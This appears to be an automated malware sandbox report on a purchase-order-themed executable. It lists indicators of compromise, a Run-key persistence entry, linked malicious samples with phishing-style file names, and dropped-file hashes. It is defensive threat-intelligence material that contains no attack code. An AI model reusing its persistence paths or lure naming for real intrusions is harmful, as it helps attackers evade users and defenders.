                                            • Quality standard deviation: 31.2%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 168.61.161.212, 52.147.198.201, 67.26.83.254, 8.241.82.126, 8.238.36.254, 8.241.78.126, 8.253.207.121, 104.43.193.48, 40.88.32.150, 52.255.188.83, 95.100.54.203, 20.82.209.183, 23.0.174.200, 23.0.174.185, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383917/sample/08042021New-PurchaseOrder.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:24:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                            12:24:36API Interceptor535x Sleep call for process: 08042021New-PurchaseOrder.exe modified
                                            12:24:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                            12:24:52API Interceptor51x Sleep call for process: powershell.exe modified
                                            12:24:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            172.67.150.212ETL_126_072_60.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC5277A9663FCE09586170F6A51B96A2.html
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8CB85A57C5722245E360D575B497E6CC.html
                                            kayo.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-867E80DBC8FFAEC73AC7FD4FE1DA1A1B.html
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E073BCECB8DFC74A5738D8B1C32D8436.html
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
                                            items list.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                            Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D1FD69143FEE625518220B28083FA2F9.html
                                            SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09750D54320914EBBBA77235AE2BC46B.html
                                            RFQ #46200058149.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE6EFB3AED9F05224C930BEF8BE1CC20.html
                                            Payment Slip E05060_47.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
                                            New Orders.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-28D56F639751140E7A008217BE126C8D.html
                                            DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html
                                            BL8846545545363.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
                                            BL84995005038483.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            myliverpoolnews.cfETL_126_072_60.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            BL01345678053567.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            items list.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SKMC25832100083932157.jarGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PO75773937475895377.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            New Order.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                            • 172.67.150.212

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUSETL_126_072_60.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            PO4308.exeGet hashmaliciousBrowse
                                            • 104.21.49.158
                                            pumYguna1i.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            gqnTRCdv5u.exeGet hashmaliciousBrowse
                                            • 104.21.65.7
                                            Calt7BoW2a.exeGet hashmaliciousBrowse
                                            • 104.21.48.10
                                            0BAdCQQVtP.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            TazxfJHRhq.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            AQJEKNHnWK.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            hvEop8Y70Y.exeGet hashmaliciousBrowse
                                            • 172.67.219.254
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                            • 172.67.164.131

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adMT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            BL01345678053567.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SER09090899.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            cricket.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SKMC25832100083932157.jarGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeRFQ-034.exeGet hashmaliciousBrowse
                                              Payment Slip.exeGet hashmaliciousBrowse
                                                Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                  Sales_Order description.exeGet hashmaliciousBrowse
                                                    Outstanding invoices.exeGet hashmaliciousBrowse
                                                      Q88_Bulk Carrier.exeGet hashmaliciousBrowse
                                                        Payment _Slip copy.exeGet hashmaliciousBrowse
                                                          MV. HUA KAI V-2023.exeGet hashmaliciousBrowse
                                                            Order_April shipment.exeGet hashmaliciousBrowse
                                                              INVOICE for Order PIEX310113978.exeGet hashmaliciousBrowse
                                                                Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                                  TT SWIFT COPY.exeGet hashmaliciousBrowse
                                                                    PO75773937475895377.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                                                        Download Report.06.05.2021.exeGet hashmaliciousBrowse
                                                                          Outstanding invoices.exeGet hashmaliciousBrowse
                                                                            IMG_767893434432.exeGet hashmaliciousBrowse
                                                                              VMtEguRH.exeGet hashmaliciousBrowse
                                                                                SHIPPING DOCS - MV. SN QUEEN.exeGet hashmaliciousBrowse
                                                                                  MT CAPE AZALEA V219 PENAVICO 13-10-20.exeGet hashmaliciousBrowse

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_08042021New-Purc_27713ebec8c220f2d5c09c5ea843cd62601d18_a44221a1_197a503e\Report.wer
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):17810
                                                                                    Entropy (8bit):3.76111653919658
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:JVWG2858mHBUZMXSaKQqueZiAr/u7sHS274ItrID:a859BUZMXSaFmD/u7sHX4ItrID
                                                                                    MD5:AF4E1C227B0751BF1A53848C9F03A9E6
                                                                                    SHA1:DC534378D22964114EEAAFAF7A386E17ED6956A2
                                                                                    SHA-256:A8579E2D19A25EA28420219C22800E67AC709339BBFAD9B4452F071C8D6245FB
                                                                                    SHA-512:E6E0347F43F7E4212DA8047A0691AC3517FBE69831A76EB2812401BBB134C3BA563BD0665C384378B36AC6EDF86C7151C05CEBD40BAE5E67A1F48CD32C196AB4
                                                                                    Malicious:false
                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.8.3.4.6.6.6.5.0.6.8.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.8.3.4.7.0.8.3.8.1.6.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.0.a.5.8.b.3.-.2.9.a.2.-.4.f.9.b.-.8.9.3.8.-.1.5.8.b.8.4.7.8.1.5.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.a.9.2.e.4.f.-.e.7.0.9.-.4.7.9.5.-.a.d.9.8.-.d.7.9.8.3.7.b.9.f.1.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.8.0.4.2.0.2.1.N.e.w.-.P.u.r.c.h.a.s.e.O.r.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.5.8.-.0.0.0.1.-.0.0.1.7.-.7.b.9.7.-.1.0.b.3.a.c.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.0.e.f.4.2.4.d.2.0.0.0.f.1.8.e.6.b.8.3.
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A64.tmp.dmp
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Apr 8 19:24:28 2021, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):216131
                                                                                    Entropy (8bit):4.277177437167617
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:K9gIOgF5D0IUCgU/OMonDD0Jjd+pLnLqmIQ8AC:K9RpDDLTj1+n0+pbQ
                                                                                    MD5:76DAA92CA9E2F639D4A568D2A4D70E64
                                                                                    SHA1:94D20601C7B055218717B090681CF098B84CB54B
                                                                                    SHA-256:2D78C048DC77E027A8F20DBCA16AA6D7EFAB2839F61CE8184A7B57DFFBCF8926
                                                                                    SHA-512:8C6F28A50D4E07A10B0D0739D82CEA7DD0D6A51A715D2593BD0856980A9C41E71DD889225AD17238CAF35766EB62B8516298ACFE40781B802A1F1A7800E636A3
                                                                                    Malicious:false
                                                                                    Preview: MDMP....... .......lXo`...................U...........B......t2......GenuineIntelW...........T.......X...DXo`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER48CD.tmp.WERInternalMetadata.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8464
                                                                                    Entropy (8bit):3.691990666806616
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Rrl7r3GLNi1wx6a4N6YSCSUB6r9BagmfZGSJCpr589bqnosf0lTum:RrlsNi1O636YXSUB6qgmfESHqnbfg
                                                                                    MD5:2EE7D828681FD55EEB4F8891CD796B2A
                                                                                    SHA1:EFD9CE3F378CDC328073951F1ECB3991E236BBE2
                                                                                    SHA-256:CE5351E5E76808C0B7092BDAEB352E9580361AD4105E0FBD159CF88356D2B910
                                                                                    SHA-512:D8ABBCFEDE9CC145CA3F79ED1D873BF39720D004D9CCBFE7AE062E7E9B67DF0F7F924929AE96E3BF6F2A3DB6798131BC1059520700A63592FB0403D079EDBC12
                                                                                    Malicious:false
                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.5.2.<./.P.i.d.>.......
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A06.tmp.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4825
                                                                                    Entropy (8bit):4.497489010071743
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9e4WSC8BY8fm8M4JyFFJT+q8vjTnEM6b3/5dd:uITfk1xSNHJEKfnEM6D5dd
                                                                                    MD5:2AB29E9A09B790218331EC3C4CEE857A
                                                                                    SHA1:9CAA69CF504EBEE2B77AA77B68EAA3C6E6104103
                                                                                    SHA-256:6CCEC29B8813A4EE4751818F0C609B4B964995A8C96F7D908D2A5DFAC9E15E06
                                                                                    SHA-512:7C2067CCE77DE292366EBD378F09C46769A5BFF6211177D6FE3403FCB899DA1CBD03216EBF04AADAD73108951FBEAE097C8B850576D68ACD13279F01BF5EBD85
                                                                                    Malicious:false
                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):326
                                                                                    Entropy (8bit):3.1192967794857243
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKjkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:IwTJrkPlE99SNxAhUe0ht
                                                                                    MD5:867208FDC0011BB0AAD04D0F71742310
                                                                                    SHA1:0F84E3ADACBAFE22A60258CBD0E55F52D0182F52
                                                                                    SHA-256:D3126C132F43D87523FD33D729EC3885ACD6AD5557D9056E447EBB0FE3F44B66
                                                                                    SHA-512:E5F073C2625506540A70A1827CA6E49392071717A7D9B6E645E7CB85C545BECC0279E33DE26205DF953C4999AEC645199FDA5B6F5A05582C7863FFF88271ED7F
                                                                                    Malicious:false
                                                                                    Preview: p...... .........Z...,..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):14734
                                                                                    Entropy (8bit):4.993014478972177
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                    Malicious:false
                                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):22336
                                                                                    Entropy (8bit):5.600727062315433
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ltCDX0qZhF4/RY4Kn4jultI2D7Y9gxSJUeRe1BMrmb4SRV7rSLkC564I+pzg:0fFiu4K4CltJ3xXeNqFivE
                                                                                    MD5:73198456EC9CD93402A12C67F75EEBD5
